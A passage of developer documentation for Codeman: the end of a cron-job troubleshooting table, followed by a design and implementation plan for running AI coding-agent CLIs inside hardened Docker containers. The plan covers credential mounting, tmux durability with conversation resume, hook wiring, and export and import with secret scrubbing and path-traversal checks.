| Job never fires | Disabled, or `nextRunAt: null` | Check **Enabled**; verify the schedule fields are complete. |
| Run shows `failed` immediately | Bad `workingDir`, prompt-file rejected, or session cap hit | Read `errorMessage` on the run; confirm the dir exists and the prompt file is inside it and < 1 MiB. |
| Run shows `skipped` | `skip_if_same_agent_running` + another live same-type session (this job's own sessions and dead tabs don't count) | Switch to `warn_only`, or wait for the other session to end. |
| Run fails with "single line" | Multi-line prompt text / prompt file | Keep the prompt to one line; point the agent at a file to read for long instructions. |
| Sessions pile up between runs | `autoClosePreviousSession: false` | Re-enable auto-close, or delete old tabs before the 50-session cap bites (see §8). |
| Wrong fire time | Timezone assumption | Times are **server-local** — check the host clock/TZ. |
| One-time job won't re-fire | `completedOnce` set | Edit the schedule (any real schedule change re-arms it). |
---
## 16. Related docs
- `docs/cron-discovery.md` — architecture / integration-point analysis (why the
feature reuses the session layer and stays distinct from `ScheduledRun`).
- `docs/cron-build-brief.md` — the original build brief / requirements.
1.**Isolation posture**: CONVENIENT default (bind-mount host `~/.claude` etc. read-write so the existing login just works; network on; still hardened non-root + cap-drop + resource caps). SEALED profile (`mountCredentials:false` + `network:none`) is a per-case opt-in.
2.**Export**: offer BOTH full-image (`commit`+`save`+workspace tar) AND workspace-only, side by side, no default (ask each time).
3.**Base image**: BUILD LOCALLY on first use via `scripts/build-agent-image.mjs` from a repo `docker/agent.Dockerfile`. No registry required. (GHCR pull can be added later.)
4.**Hooks**: WIRE HOOKS NOW. Codeman scaffolds `.claude/settings.local.json` + CLAUDE.md into the linked host workspace dir (same as local cases), enabling in-container permission prompts, hook-idle detection, and the Claude Model picker.
Adopted defaults for the remaining open items (Section 10): resume-on-restart ON; container is per-CASE and shared by multiple sessions (killing one session only kills its in-container tmux session, never `docker stop` while siblings remain; stop/remove only on explicit teardown or case-delete); rootless caps = ship-with-warning (`capsEnforced` surfaced); remote docker daemon = local-first; podman = docker-first best-effort.
## Implementation status (branch `feat/docker-session-mode`)
DONE and END-TO-END VERIFIED against a real docker daemon (create host, link case, quick-start shell in a real container, workspace bind-mount round-trip, hook scaffolding, session-delete keeps the shared container up, case-delete `docker rm`s it):
- Phase 0-1: types (`DockerHost`/`DockerCase`/`SessionDocker`), `src/docker-hosts.ts` (storage, pure `buildDockerBaseArgs`/`buildDockerCreateArgs`, `containerApiUrl`, `hostGatewayAlias`, config-hash, credential-mount resolution, daemon probes), `DockerHostSchema`/`DockerCaseLinkSchema`. 26 unit tests.
- Deferred refinements: in-container model-picker via `settings.local.json`; live mid-run resume-id capture into `DockerCase.lastClaudeSessionId`; rootless/Desktop uid probe (currently a platform heuristic).
## 1. Goal & user stories
Add "Docker cases" to Codeman: a case can point at a container instead of a local or remote-SSH path, and any of the five CLI backends (`claude` / `shell` / `opencode` / `codex` / `gemini`) runs inside that container. It is modeled as a LOCATION OVERLAY on cases, exactly like the remote-SSH feature (COD-94/#145), never as a sixth `SessionMode`.
User stories:
- As the repo owner, I link a case to a per-project container so an autonomous Claude/Ralph run executes in a hardened sandbox (cap-drop, non-root, resource caps) instead of directly on my host, while keeping my existing OAuth login and transcript history working with zero extra setup.
- I set default, per-case-changeable container settings (image, network mode, memory/cpu/pids caps) at link time and edit them later, and edits actually take effect through a recreate-on-drift path (see Section 4).
- I reconnect after a Codeman restart and land back in the SAME running agent with the conversation intact. When the CONTAINER itself was stopped/rebooted/OOM-killed (which destroys the in-container tmux), the next launch RESUMES the last conversation from the bind-mounted transcript rather than starting fresh (durability model in Section 2, Key decision 1).
- I export a finished run's whole environment (toolchain plus workspace) to a portable, secret-free `.tar.gz`, move it to another machine, and import it back into a fresh case in one click.
- The container never accumulates: killing the session stops it, deleting the case removes it, and an instance-scoped boot reaper reaps containers whose case is gone.
Non-goals for the MVP: multi-tenant untrusted-code isolation guarantees (Codeman is loopback-default and single-operator, and the agent already runs `--dangerously-skip-permissions` on the host today), Kubernetes/compose orchestration, and per-command ephemeral containers.
## 2. Chosen architecture and why
The design grafts the strongest idea from each of the three proposals:
- Overlay-not-a-mode + faithful remote-SSH mirror (from "Docker Cases as a Location Overlay"): lowest churn, rides the existing quick-start / mux-sessions / state / recovery plumbing.
- Convenient-but-hardened default with an opt-in sealed profile, plus exec-time name-only secret env (from "Sealed Sandbox"): a strict security improvement over today's on-host execution without the UX tax of forcing an in-container re-login.
### Key decision 1: persistent per-CASE container, durable in-container tmux, AND resume-on-restart (the two-layer durability model)
Exactly one long-lived container per Docker case, named as a pure slug function `codeman-case-<slug>` (Docker charset `^[a-zA-Z0-9][a-zA-Z0-9_.-]+$`; Codeman already slugs case names for tmux), so create-if-missing and boot recovery are idempotent. PID1 is `sleep infinity` under `--init` (tini reaps zombies and forwards `docker stop`'s SIGTERM); the CLI is NOT the container command. The CLI runs inside a DURABLE in-container tmux on a dedicated socket `-L codeman-docker`, session `codeman-dkr-<id8>`, the direct analog of remote's `-L codeman-remote` / `codeman-ssh-<id8>`.
Two DIFFERENT failure surfaces need two DIFFERENT recovery layers, and conflating them is the central flaw the critic caught:
1. Codeman-PROCESS restart while the container stays up: the in-container tmux is still alive, so `tmux new-session -A` (attach-or-create) reattaches the SAME live agent and the paneCommand is ignored. This is the remote-SSH durability idiom and it works unchanged.
2. CONTAINER stop / daemon restart / host reboot / OOM-kill: the in-container tmux is GONE (fresh PID1). `new-session -A` will now CREATE a fresh session and run the paneCommand, which would start a brand-new conversation. This is the case the raw plan silently lost. Because the transcript directory is bind-mounted from the host (Key decision 3), the fix is to launch with RESUME: the paneCommand becomes `exec claude --dangerously-skip-permissions --resume <claudeSessionId>` (codex uses `resume <id>`, gemini `--resume <id>`) whenever a captured `claudeSessionId` exists. The `-A` semantics make this self-selecting: the resume flag only ever executes when tmux is actually re-created, which is exactly when the live session was lost. When tmux is still alive (case 1), attach wins and the flag is inert.
Capturing / persisting / reusing the resume id (the missing mechanism the critic flagged): Codeman already learns `Session.claudeSessionId` from transcript correlation (which works here because projHash matches, Key decision 3) and persists it in `SessionState`. We thread that value into `createSessionOptions` / `respawnPaneOptions` for docker so `buildDockerLaunchCommand` can inject the resume flag on any relaunch. To make a NEW Codeman session (new `id8`) re-launched against the same case resume its predecessor's conversation, we ALSO persist `lastClaudeSessionId` on the `DockerCase` record; the quick-start docker branch seeds the new `Session` with it when the `dockerResumeOnStart` setting is on. First-ever launch has no id, so it starts fresh. This is user-decision 7 (default resume behavior).
Reconciling with stop-on-kill and with the `--restart` policy (the internal inconsistency the critic found): the container is created with `--restart no` uniformly (Codeman's idempotent create-if-missing plus boot recovery is the single recovery mechanism; a restart policy would not preserve the conversation anyway because a restarted container gets a fresh PID1/tmux). Boot recovery re-runs `buildDockerLaunchCommand` from the restored `MuxSession.docker` (`docker inspect || docker create; docker start`, then exec with resume), so a host reboot or daemon restart recreates+starts the container and resumes the conversation instead of the session vanishing. `reconcileSessions` (tmux-manager.ts ~1800-1815) must NOT hard-delete a docker session merely because no LOCAL pane exists after the local `-L codeman` server died; docker (like remote) sessions are restored from `mux-sessions.json` and relaunched. This relaunch path is explicitly part of Phase 4/Phase 3 recovery work, not assumed.
Why this over the alternatives: `docker exec` gets SIGHUP and dies when its client TTY closes, so a bare `docker exec claude` restarts the CLI on every reconnect/respawn. The inner tmux plus resume is what makes reconnect idempotent across BOTH failure surfaces. Because this durability is the single most important design point, tmux-in-image is a HARD gated prerequisite (`checkDockerTmuxAvailable`), never a silent fallback to bare exec. Rejected alternatives: ephemeral-per-run or bare-exec containers (no reattach durability); a literal `'docker'``SessionMode` (touches dozens of switch/enum sites and diverges from the remote overlay precedent, since Docker is a LOCATION orthogonal to the 5 CLI backends).
### Key decision 2: CLI + auth delivery
One prebuilt base image (built once, contains NO secrets): `node:22-bookworm-slim` + `git tmux ripgrep ca-certificates`, `npm i -g @anthropic-ai/claude-code @openai/codex @google/gemini-cli opencode-ai`, an `agent` user, HOME dirs made writable by an arbitrary host uid via the OpenShift "gid 0, group-writable" convention (Key decision 6). Because the toolchain is baked, export is reproducible and needs no network at import time. The image name/namespace/registry and its refresh cadence are user-decision 2 (the `codeman/agent:base` placeholder implies a Docker Hub org the project may not own).
Credentials are delivered ONLY at runtime, two commit-safe channels, default convenient:
- OAuth/config-file CLIs (Claude Max/Pro, gcloud, opencode): bind-mount the host credential dirs read-write (`~/.claude`, `~/.codex`, `~/.gemini` + `~/.config/gcloud`, `~/.config/opencode`) so the common user "just works" with no in-container login. Because these are bind mounts, `docker commit` (which captures only the container's own writable layer, never bind mounts) physically cannot capture them, so exports stay secret-free.
- API-key CLIs (codex/gemini): exec-time NAME-ONLY `docker exec --env OPENAI_API_KEY --env GEMINI_API_KEY ...` (no `=value`), sourced from Codeman's own process env. Only the key NAME appears in argv (no `ps` leak), and per-exec env is never captured by `docker commit`. This is the technique Codeman already uses via `tmux setenv` for the local Codex/Gemini panes, so it composes with existing machinery.
Per-host `DockerHost.mountCredentials` defaults `true` (convenient); setting it `false` yields a SEALED profile (no host cred mounts, in-container login only) for genuinely untrusted work. CRITICAL sealed-mode export rule (the leak the critic caught): in sealed mode the in-container login writes tokens into the container's OWN writable layer, which `docker commit` DOES capture, so a full-image export of a sealed container would ship credentials. Therefore full-image export is REFUSED for `mountCredentials:false` containers by default; the user may either take a workspace-only export (always safe) or opt into a pre-commit scrub that `docker exec`s `rm -rf ~/.claude ~/.codex ~/.gemini ~/.config/gcloud ~/.config/opencode` inside the container before commit (destructive to the in-container login, which is the point). This is enforced in the export route, not left to a manifest assertion.
Per-session `envOverrides` / `effort` / `codexConfig` / `geminiConfig` / `openCodeConfig` are REJECTED at quick-start exactly like the remote branch (session-routes.ts ~1698-1710). `modelOverride` is the one deliberate difference from remote: because the docker workspace is a REAL bind-mounted host dir that Codeman scaffolds (Key decision 5 and Section 6), `updateCaseModel()` can write the `model` key into `<workspace>/.claude/settings.local.json` and the in-container `claude` reads it, so the App Settings Claude Model picker works for docker cases. `effort` is a `--effort` CLI arg applied only by the local-spawn path we bypass, so it stays rejected (surfaced honestly in the UI, not silently inert). Per-mode command customization goes through `DockerHost.commands.<mode>` (`defaultDockerCommandForMode`, mirror of `defaultRemoteCommandForMode` at remote-hosts.ts:60). NEVER bake secrets into an image layer and NEVER pass a secret via create-time `-e` (both are committed).
Rejected alternative: sealed-by-default. For a single-operator loopback tool where the agent already runs skip-permissions on the host, forcing an in-container OAuth re-login is a UX regression with little real gain. We keep sealed as an opt-in. Rejected alternative: baking a login into the image, which leaks the instant you `docker save`.
Bind-mount the host workspace dir into the container at the SAME absolute path (`dst == src`, mirror the host path), and set both `Session.workingDir` and the container workdir to that host path.
Two problems this solves that the raw proposals got wrong:
- File features: `DockerCase.hostWorkspacePath` is a REAL host directory, so `Session.workingDir = hostWorkspacePath` keeps file-routes, attachments, image-watcher, and previews working on real host bytes (unlike remote, where the path is remote-only and those features no-op). All three proposals wired `casePath = <container path>`; we deliberately diverge and use the host path.
- Transcript correlation: Claude writes transcripts under `~/.claude/projects/<hash-of-CWD>/`. By mirroring the host path as the container CWD, the projHash computed inside the container equals the host-side hash Codeman's transcript/subagent/workflow watchers expect, so correlation keeps working (and, in turn, feeds the resume-id capture in Key decision 1). A `/workspace`-style fixed dst would break it. Mirror-vs-fixed is user-decision 3.
`resolveMuxAttachCwd` still returns `/tmp` for docker sessions (the LOCAL bash pane only runs `docker exec`; it never needs the workspace as its cwd), mirroring remote.
### Key decision 4: network default and the engine-specific host gateway
Default `bridge` (own netns, NAT egress, no inbound), per-case changeable to `none` (offline shell sandbox; warned because it breaks the API CLIs) or `custom` (a user-defined bridge `codeman-net-<slug>`, the chokepoint for a future egress allowlist). `host` networking and any `-p` inbound publish are structurally unrepresentable in the flag builder and schema. Rationale: every API-backed CLI (Claude, Codex, Gemini) plus npm/git needs egress, so `bridge` is the only sane functional default; `none` is reserved for `shell`.
The host-callback gateway alias is ENGINE-SPECIFIC (the critic's podman finding): Docker uses `host.docker.internal`, Podman uses `host.containers.internal` (Docker's alias only exists on recent podman). A helper `hostGatewayAlias(engine)` returns the right name; Section 2.5, the create args, the `CODEMAN_API_URL` rewrite, and the host-guard allowlist all consume it, and BOTH aliases are added to the allowlist so a mixed fleet keeps working.
### Key decision 5: hooks actually reach the host AND are actually installed
Two independent things must both be true for a hook to fire, and the raw plan wired only the first:
1. Network reachability. Claude Code hooks POST to `$CODEMAN_API_URL` (`curl -sk`). Inside a bridge container `localhost` is the container and prod binds `127.0.0.1`, so we set `--add-host <gatewayAlias>:host-gateway` on create (skipped on Docker Desktop, where the alias is native), add the gateway alias to the host guard, and provide `CODEMAN_API_URL` and the hook secret (below).
2. Hook INSTALLATION. Hooks live in `<workspace>/.claude/settings.local.json`, written by the quick-start scaffolding block (around session-routes.ts ~1776) that calls `writeHooksConfig()` / `updateCaseModel()`. The raw plan extended the `!remote` guard to `!remote && !docker`, which would SKIP that block and silently disable ALL hooks regardless of networking. For docker the workspace is a REAL bind-mounted host dir, so the scaffolding block MUST run. Precise fix: extend to `!remote && !docker` ONLY the LOCAL-CLI-availability and local-spawn guards (the ones that stat the local binary or build the local spawn command); leave the workspace-scaffolding guard at `!remote` so it runs for docker. This same decision is what makes `modelOverride` work (Key decision 2). Consequence, surfaced as user-decision 4: linking a docker case now WRITES `.claude/settings.local.json` (and the CLAUDE.md scaffold, matching local-case behavior) into the user's real host directory, a behavioral shift from "link a dir" to "link and scaffold a dir."
`CODEMAN_API_URL` derivation (the wrong-scheme bug the critic caught): prod is HTTPS-only on 3000, and `server.ts` (~2000) auto-sets `process.env.CODEMAN_API_URL = ${protocol}://${apiHost}:${port}`. Hardcoding `http://host.docker.internal:3000` fails every hook. Instead a pure helper `containerApiUrl(process.env.CODEMAN_API_URL, engine)` parses the running URL and substitutes ONLY the hostname with `hostGatewayAlias(engine)`, preserving scheme and port (`https://host.docker.internal:3000`). Unit-tested against http, https, non-default ports, and both engines. Passed as create-time `--env CODEMAN_API_URL=<derived>` (case-stable, non-secret).
Hook secret and session attribution:
-`~/.codeman/hook-secret` is bind-mounted read-only to a container path; `--env CODEMAN_HOOK_SECRET_FILE=<that path>` is create-time (a path is non-secret; the bytes ride the bind mount and are never committed).
-`CODEMAN_SESSION_ID` (which the generated hooks reference at hooks-config.ts:78-80 to attribute events) plus `CODEMAN_MUX=1` are SESSION-scoped, so they are passed at EXEC time via `docker exec --env CODEMAN_SESSION_ID=<id> --env CODEMAN_MUX=1` (non-secret, value inline is fine, and exec env is not committed). Because a `tmux` session started fresh only inherits the invoking env when it starts the SERVER, the launch chain ALSO runs `tmux -L codeman-docker setenv -g CODEMAN_SESSION_ID <id>` (and `CODEMAN_MUX`) so reattaches and newly created panes see the same values. This mirrors how Codeman already injects per-session env into tmux for the external CLIs.
Hooks-in-MVP-vs-deferred stays user-decision 4; if deferred, docker ships as explicitly hook-degraded and we lean on output-based idle detection through the docker-exec PTY.
The raw plan showed `--user 1000:1000` in one place and `--user "$(id -u):$(id -g)"` in another and never resolved HOME writability; this section fixes all of it.
- Linux native (docker rootful or rootless): run `--user <hostUid>:0` (host uid, GID 0). The image follows the OpenShift arbitrary-uid convention: `HOME=/home/agent`, and `/home/agent` plus the tool cache dirs (`~/.npm`, `~/.cache`, `~/.config`) are owned `root:0` and group-writable (`chmod -R g+w`, `g+s` on dirs) so a process with GID 0 can write HOME even though its UID is not 1000. This keeps workspace files host-owned (the agent's UID is the host UID) AND keeps HOME writable, so the CLIs actually start.
- Podman rootless: use `--userns=keep-id` (maps the host uid to the image's `agent` uid inside the container) instead of `--user`, so `/home/agent` is owned by the running user and workspace files are host-owned. This is a real per-engine branch in `buildDockerCreateArgs`.
- macOS Docker Desktop: `--user <macUid>` (e.g. 501) does not own the image's `/home/agent`, so non-bind HOME writes fail EACCES and the CLIs may not start; Desktop also does its own bind-mount uid translation, provides `host.docker.internal` natively (no `--add-host`), and its VM memory ceiling can cap `--memory`. Detect Desktop via `docker info` (Server OS `linuxkit` / `OperatingString` contains "Docker Desktop") and take a dedicated path: do NOT pass `--user` (run as the image's baked `agent` uid and rely on Desktop's translation for workspace access), skip `--add-host`, and note in the UI that memory caps are subject to the VM ceiling.
Rootless resource-cap enforcement (the silently-inert risk): rootless Docker without cgroup-v2 systemd delegation (`Delegate=yes`) silently IGNORES `--memory`/`--cpus`/`--pids-limit`. The probe checks `docker info` for `CgroupVersion=2` plus rootless plus delegation; if caps cannot be enforced, `checkDockerAvailable` returns `capsEnforced:false` and the link/probe surfaces "resource caps are advisory on this engine." Whether to REQUIRE delegation or ship-with-warning is user-decision 6.
## 3. Data model
New TypeScript types in `src/types/session.ts`, added right after the remote types (lines 46-99). SessionMode (line 44) is UNCHANGED.
-`SessionState` gains `docker?: SessionDocker` immediately after `remote?` (line 219). It persists automatically because `SessionState` is structural and `state-store.ts` stores `toState()` verbatim.
-`src/mux-interface.ts`: add `docker?: SessionDocker` to `MuxSession` (after line 38), `CreateSessionOptions` (after 81), `RespawnPaneOptions` (after 105). `MuxSession.docker` round-trips through `mux-sessions.json` automatically.
-`src/types/api.ts``CaseInfo`: add `'docker'` to the `location` union and a `docker?: { hostId; container; image?; path; network }` display block.
-`src/services/unified-session-service.ts`: add a boolean `docker?` flag on `UnifiedSessionItem` and source rows, set from `MuxSession.docker` presence (mirror the `remote` flag at ~line 200 and the harvest at session-routes.ts:2313).
New state files (all via `dataPath()`, mirroring `remote-hosts.json` / `remote-cases.json`):
-`~/.codeman/docker-cases.json` (`name -> DockerCase`, including `lastClaudeSessionId`).
-`~/.codeman/docker-exports/` (dedicated dir for `.image.tar.gz` + `.workspace.tar.gz` + `manifest.json`; never inline in state.json; retention/pruning per Section 5).
No new `state.json` / `mux-sessions.json` files: `SessionState.docker` and `MuxSession.docker` ride the existing serialization.
## 4. Container lifecycle (exact command shapes)
All builders are PURE string functions (directly unit-testable). Host values interpolated into the outer `bash -c "..."` layer (container name, image, workdir, host paths) are `shellescape()`'d and, for user-supplied fields, schema-rejected for `$`/backtick via `NO_SHELL_META`. The escaping chain here is DEEPER than remote's single `ssh '<tmux ...>'`: the whole `docker inspect || docker create <dozens of --mount/--env/shellescaped host paths>` is interpolated into `bash -c "..."` then `JSON.stringify`'d into respawn-pane. This is a known place to get stuck, so it is covered by concrete escaping tests (Section 9), including host workspace paths containing spaces, not just a "we call shellescape" claim.
`buildDockerBaseArgs(docker)` (pure, in `docker-hosts.ts`, mirror of `buildSshConnectionArgs`) emits the engine prefix tokens: `docker` (or `podman`) + optional `--context <ctx>` or `-H <daemonHost>`. `buildDockerCreateArgs(docker, sessionId)` emits the `docker create` flag array (with the per-engine uid/userns branch from Key decision 6).
IMAGE PRESENCE (before any create, the auto-pull footgun the critic caught): the launch chain runs `docker image inspect <image> >/dev/null 2>&1` first; on miss it exits with a distinct message ("base image <ref> not present: build with scripts/build-agent-image.mjs or pull it") rather than triggering a blocking multi-GB auto-pull inside the tmux pane. `docker create` carries `--pull=never`. The tmux-availability probe likewise uses `docker run --rm --pull=never <image> sh -lc 'command -v tmux'` and reports the same build/pull hint if the image is absent, so the 15s-bounded probe never hangs on a pull.
CREATE (the ensure step, embedded in the launch string):
-`--user 1000:0` shown is the Linux-native form with GID 0 (Key decision 6); it is actually `--user <hostUid>:0`, or `--userns=keep-id` for podman rootless, or omitted on Docker Desktop. The literal is illustrative only.
- Create-time `--env` carries only NON-SESSION, non-secret, case-stable values (safe to be committed): the DERIVED `CODEMAN_API_URL` (https-preserving, Key decision 5) and the hook-secret FILE PATH. `CODEMAN_SESSION_ID`/`CODEMAN_MUX` and the codex/gemini key NAMES are exec-time only.
-`codeman.instance=<CODEMAN_INSTANCE>` is REQUIRED on the label set so the boot reaper is instance-scoped (a beta/second instance must never reap prod's containers).
-`codeman.confighash` is a stable hash of the drift-relevant create args (image, resources, network, mounts, non-session env). Drift detection (user story 2, the config-never-takes-effect gap): on launch the ensure block compares the desired hash to the existing container's label; on mismatch the launch does NOT silently reuse the stale container. Instead the docker route returns a "container config changed, recreate?" action (SSE + UI confirm), and on confirm Codeman `docker rm`'s and recreates. rm destroys in-image (non-bind) state, but the workspace and transcripts survive on their bind mounts and the conversation is restored via `--resume`, so the recreate is safe. Auto-recreate-vs-prompt is a UI choice; the MVP prompts.
-`--restart no` (resolved consistently with Key decision 1; recovery is Codeman's idempotent create-if-missing, not an engine restart policy, which also matters for Podman which has no daemon).
EXEC (`buildDockerLaunchCommand`, the docker analog of `buildRemoteLaunchCommand`, TTY-correct, resume-aware). The whole thing is ONE `bash -c` string that image-checks, ensures, starts, primes tmux env, then execs:
```
docker image inspect codeman/agent:base >/dev/null 2>&1 || { echo 'Codeman: base image codeman/agent:base not present (build or pull it)'; exit 1; } ; \
sh -lc 'tmux -L codeman-docker setenv -g CODEMAN_SESSION_ID 1a2b3c4d \; setenv -g CODEMAN_MUX 1 \; new-session -A -s codeman-dkr-1a2b3c4d -c '\''/home/arkon/cases/myproj'\'' '\''cd /home/arkon/cases/myproj && exec claude --dangerously-skip-permissions --resume <claudeSessionId>'\'' \; set -t codeman-dkr-1a2b3c4d status off \; set -t codeman-dkr-1a2b3c4d mouse off \; set -t codeman-dkr-1a2b3c4d prefix C-q \; set -s escape-time 0'
```
-`docker exec -it`: `-t` allocates a PTY and forwards SIGWINCH into the container so the Ink TUI re-lays-out on pane resize; `TERM`/`COLORTERM` prevent degraded rendering. `--env OPENAI_API_KEY` (name only) is present only for codex/gemini and is exec-time (never committed). `CODEMAN_SESSION_ID`/`CODEMAN_MUX` are exec-time values plus a `tmux setenv -g` prime so reattaches and new panes inherit them (Key decision 5).
-`--resume <claudeSessionId>` (codex `resume <id>`, gemini `--resume <id>`) is appended to `modeCommand` ONLY when a captured id exists; on first launch it is omitted. `new-session -A` makes the flag inert on a live-tmux reattach and effective only when tmux is re-created (Key decision 1).
-`modeCommand = docker.commands?.[mode] || defaultDockerCommandForMode(mode)` (`exec claude --dangerously-skip-permissions`, `exec bash -l`, etc.), with the resume suffix injected by the builder.
- Escaping survives every layer identically to remote in shape but deeper in nesting: `paneCommand` (`cd ... && exec ...`) is one shellescaped tmux arg, the whole `tmuxInvocation` is one shellescaped `sh -lc` arg, and the outer string is `JSON.stringify()`'d into `bash -c` by respawn-pane (tmux-manager.ts:1329).
- respawnPane: same two edits at lines 1524 and 1542.
START / reattach-after-reboot: the ensure block (image-check, `docker inspect || docker create`, `docker start`) is fully idempotent, so boot recovery just re-runs `buildDockerLaunchCommand` from the restored `MuxSession.docker` with the persisted resume id. A rebooted host recreates the container and resumes the conversation.
DOCKER-DOWN surfacing (the PTY-exit-breaker false-trip risk): if `docker start` or `docker exec` cannot attach (daemon down, container missing), the launch prints a docker-specific message and exits, which alone would still count toward `session-pty-exit-breaker` and show a generic "respawn breaker tripped" push. To avoid masking the cause, the docker reattach path runs a fast `checkDockerAvailable` pre-flight: if the daemon/container is unreachable, Codeman broadcasts a docker-specific error (SSE + push, "container <name> is not running / daemon down") and SKIPS the auto-reattach that would trip the breaker, rather than fast-looping `docker exec`.
STOP / KILL (`killSession` Strategy 3c, right after remote's Strategy 3b at tmux-manager.ts:1719, guarded by `IS_TEST_MODE`):
```ts
if(session.docker){
// best-effort, fire-and-forget, timeout-bounded so it never blocks the local kill
`buildDockerKillCommand` emits: `docker exec codeman-case-<slug> tmux -L codeman-docker kill-session -t codeman-dkr-<id8> ; docker stop -t 10 codeman-case-<slug>`. Stopping frees CPU/RAM and, per Key decision 1, is safe for conversation continuity because the NEXT launch resumes from the bind-mounted transcript via `--resume`. Whether to stop at all (RAM vs instant live-agent reattach) is user-decision 6/1 (reframed honestly). The bind-mounted workspace and transcripts always survive on the host.
REMOVE: only on explicit case delete (`docker rm -f codeman-case-<slug>`), gated behind an "export first?" UI prompt because rm destroys any in-image (non-bind) state. Instance-scoped boot reaper (fixing the racy/cross-instance reaper): after `docker-cases.json` is loaded AND after `restoreMuxSessions` has run, enumerate `docker ps -a --filter label=codeman.managed=1 --filter label=codeman.instance=<CODEMAN_INSTANCE> --format '{{.Names}}\t{{index .Labels "codeman.case"}}'` and `docker rm -f` only containers whose case is gone from THIS instance's `docker-cases.json`. The instance filter is what stops a beta reaping prod's containers (the exact cross-instance hazard the project memory warns about).
AVAILABILITY PROBE (`docker-hosts.ts`, timeout-bounded like `checkRemoteTmuxAvailable`'s 15s, `IS_TEST_MODE` no-op):
```
docker info --format '{{json .}}' # server up, CgroupVersion, rootless, OS (Desktop detect), cap-delegation
docker run --rm --pull=never <image> sh -lc 'command -v tmux' # tmux-in-image gate (hard prerequisite), only if image present
```
`checkDockerAvailable()` returns `{ ok, engine, rootless, isDesktop, cgroupV2, capsEnforced }` (parse `SecurityOptions` for `name=rootless`, `CgroupVersion`, delegation, and Server OS for Desktop). `checkDockerTmuxAvailable(host)` returns a structured result with a user-facing error and correct install hint (NOT `npm install -g`; the hint is "build/pull the base image" for a missing image and "install docker or podman" for a missing engine).
IN-CONTAINER CLI VERSION (fixing the #154 wheel-forwarding regression): the raw plan skipped the LOCAL `cliVersion` probe for docker (correct, since it reports the HOST claude) but left `cliVersion` undefined, which disables trackpad wheel-forwarding. Instead, for docker sessions Codeman runs an IN-CONTAINER probe `docker exec <container> claude --version` (bounded, `IS_TEST_MODE` no-op) and feeds THAT into `cliVersion`. This also means a stale baked CLI is visible; combined with the rebuild-cadence in user-decision 2, agents are not silently pinned to an old claude.
## 5. Export / Import
EXPORT is a concurrency-bounded job (reuse `runWithConversionLimit` from `document-conversion-limiter.ts` so N simultaneous exports cannot fork-bomb the host). Route `POST /api/docker-cases/:name/export`.
Preconditions (the consistency and leak risks the critic caught):
- Sealed guard: if `mountCredentials:false`, full-image export is REFUSED unless the caller explicitly opts into the pre-commit scrub (Key decision 2). Workspace-only export is always allowed.
- Quiesce + free-space: require the session idle, then `docker pause` the container spanning BOTH the workspace tar AND the commit so the two artifacts are mutually consistent (the raw plan paused only the commit, leaving the bind-mount tar to run against a mid-write agent). Before any heavy step, precheck free space in the exports dir and in `/var/lib/docker`; if below `DOCKER_EXPORT_MIN_FREE_BYTES`, refuse with a clear error (a full `/var/lib/docker` wedges the daemon and breaks EVERY session on the host).
Steps (all cleanup in try/finally so a mid-way failure never orphans an intermediate image or leaves the container paused):
1.`docker commit -c 'LABEL codeman.exported=1' codeman-case-<slug> codeman/export-<slug>:<ts>` (unique tag per export defeats the stale-image trap). Optional pre-commit scrub in sealed mode as above; also blank instance-specific committed env (`-c 'ENV CODEMAN_API_URL='` etc.) so the image carries no stale host references.
2.`docker save codeman/export-<slug>:<ts> | gzip` streamed in fixed 8192-byte chunks to `~/.codeman/docker-exports/<slug>-<ts>.image.tar.gz`. Uses `docker save` (layers + repo:tag + CMD), never `docker export` (flat rootfs), so restore is a trivial `docker load`.
3.`tar --numeric-owner -C <hostWorkspacePath> -czf <slug>-<ts>.workspace.tar.gz .` while paused (the bind-mounted workspace is NOT in the image, so it travels separately and consistently).
4. Write `manifest.json`: schema version, caseName, image tag, engine, containerWorkdir, resource/network config, codeman version, base-image digest, createdAt, per-member sha256, `mountCredentials`, and `secretFree` (true only for convenient-mode or scrubbed-sealed exports).
5.`docker rmi codeman/export-<slug>:<ts>` in the `finally` (delete the intermediate committed image regardless of success), then `docker unpause`.
The three files are wrapped in one bundle `<slug>-<ts>.codeman-container.tgz` and offered as a downloadable artifact through the existing file-routes streaming + attachment-registry handoff.
Retention / disk budget (user-decision 3): `docker-exports/` is capped at `DOCKER_EXPORT_KEEP` most-recent bundles with an auto-prune on each new export, plus the free-space precheck above. Workspace scrub: the WORKSPACE tar gets a scan/warn pass for agent-created `.env` / `.git/credentials` (a distinct leak channel from container creds). A lighter "workspace-only" export (just the workspace tar, no commit/save) is the fast default for 24h+ runs; full-image is the explicit heavier option (user-decision 7 in the original list, now decision on the default button below).
What travels: the baked toolchain image plus any in-image writes, and the workspace tar. What does NOT travel: bind-mounted credentials (physically excluded from commit) and anything that lived only in a bind mount. Secret-free by construction in convenient mode, and enforced (refuse-or-scrub) in sealed mode.
IMPORT `POST /api/docker-cases/import` (untrusted-bundle containment, the traversal/overwrite risk): stream the uploaded bundle, validate every manifest checksum BEFORE any extraction or load. Extract the workspace tar with `tar --no-absolute-names -C <fresh dir>` PLUS per-entry validation rejecting any member whose normalized path escapes the destination (leading `/` or `..` components). `gunzip | docker load` the image, then RE-TAG the loaded image id into a quarantined namespace `codeman/imported-<slug>:<ts>` and NEVER allow the load to overwrite `codeman/agent:base` or any pre-existing tag (capture the loaded id, ignore the bundle's repo:tag). Create a NEW `DockerCase` pointing at the quarantined image with THIS host's mounts/creds and the manifest's resource/network config, and recreate the container hardened (cap-drop ALL, no-new-privileges, non-root, `--pull=never`, CMD overridden to `sleep infinity`). The destination supplies its own login, so credentials never cross machines. Plus `GET /api/docker-exports` (list) and `DELETE /api/docker-exports/:filename`, all behind Codeman's existing auth / loopback-default / host-guard / Origin-CSRF stack.
## 6. Codeman integration (file-by-file, mirroring the remote-SSH feature)
-`src/types/session.ts`: add `DockerCommandMode`, `DockerEngine`, `DockerNetworkMode`, `DockerResourceLimits`, `DockerHost`, `DockerCase`, `SessionDocker` (Section 3). Add `docker?: SessionDocker` to `SessionState` after line 219. SessionMode (line 44) UNCHANGED.
